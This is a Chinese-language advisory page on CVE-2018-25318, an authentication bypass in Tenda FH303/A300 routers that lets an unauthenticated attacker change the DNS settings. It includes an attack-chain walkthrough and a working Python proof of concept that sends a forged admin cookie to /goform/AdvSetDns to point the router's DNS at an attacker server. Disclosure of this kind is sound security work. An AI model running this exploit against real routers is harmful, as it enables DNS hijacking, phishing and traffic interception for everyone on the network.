CVE-2018-25318 CVSS 9.8 严重

CVE-2018-25318 Tenda路由器认证绕过导致DNS劫持漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2018-25318

漏洞类型

认证绕过

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda FH303/A300

漏洞概述

Tenda FH303和A300路由器固件V5.07.68_EN版本中存在严重的会话管理不当漏洞。由于对Cookie的验证机制不足，未经身份认证的远程攻击者可以利用该漏洞修改设备的DNS设置。攻击者通过向/goform/AdvSetDns端点发送带有伪造管理员Cookie的GET请求，即可成功劫持DNS解析。这使得攻击者能够将用户的网络流量重定向至恶意网站，进一步实施中间人攻击、钓鱼攻击或窃取敏感信息。该漏洞无需用户交互即可被利用，危害极高。

技术细节

该漏洞的根本原因在于Tenda FH303/A300路由器固件在处理管理会话时的逻辑缺陷。具体而言，Web服务器未能严格验证请求中的Cookie是否为经过合法认证的会话令牌。攻击者无需获取真实的登录凭证，只需构造一个包含特定管理员标识的Cookie（例如简单的判断是否存在admin字段或特定的键值对），即可绕过身份验证检查。利用路径为/goform/AdvSetDns接口，该接口用于设置DNS服务器地址。攻击者向该接口发送HTTP GET请求，并在请求头中注入伪造的Cookie数据。由于服务器端仅检查Cookie的存在性或特定格式，而未校验其有效性和时效性，攻击者可以指定任意恶意的DNS服务器IP。一旦修改成功，连接到该路由器的所有设备在解析域名时，都会将请求发送到攻击者指定的DNS服务器，从而实现流量劫持。

攻击链分析

STEP 1

信息收集

攻击者扫描网络，识别出存在漏洞的Tenda FH303或A300路由器设备。

STEP 2

漏洞利用

攻击者向目标路由器的/goform/AdvSetDns接口发送特制的GET请求，并在HTTP头中携带伪造的管理员Cookie，绕过身份验证。

STEP 3

配置篡改

路由器接收请求后，因校验逻辑缺陷，接受该请求并将DNS服务器地址修改为攻击者控制的IP地址。

STEP 4

流量劫持

连接该路由器的用户在访问互联网时，域名解析请求被转发至恶意DNS服务器，攻击者可实施钓鱼或窃听。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_dns_change(target_ip, malicious_dns):
    """
    Exploit CVE-2018-25318: Change DNS settings on Tenda routers.
    """
    url = f"http://{target_ip}/goform/AdvSetDns"
    
    # Crafted cookie to bypass authentication (Session Weakness)
    cookies = {
        "admin": "admin"  # Weak validation allows simple cookies to act as authenticated session
    }
    
    # Parameters to set the DNS
    params = {
        "GO": "as_dns_set",
        "DYNAMIC_DNS": "0",
        "DNS1": malicious_dns,
        "DNS2": malicious_dns
    }
    
    try:
        response = requests.get(url, params=params, cookies=cookies, timeout=5)
        if response.status_code == 200:
            print(f"[+] Success: DNS changed to {malicious_dns}")
        else:
            print(f"[-] Failed: Status code {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with target IP
    dns = "8.8.8.8"       # Replace with malicious DNS
    exploit_dns_change(target, dns)

影响范围

Tenda FH303 V5.07.68_EN

Tenda A300 V5.07.68_EN

防御指南

临时缓解措施

如果无法立即升级固件，建议用户断开路由器WAN口连接或仅在配置时短暂连接。通过访问控制列表（ACL）限制局域网内IP对路由器管理界面的访问权限。此外，应定期手动检查路由器后台的DNS设置，确保未被篡改为未知IP地址。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表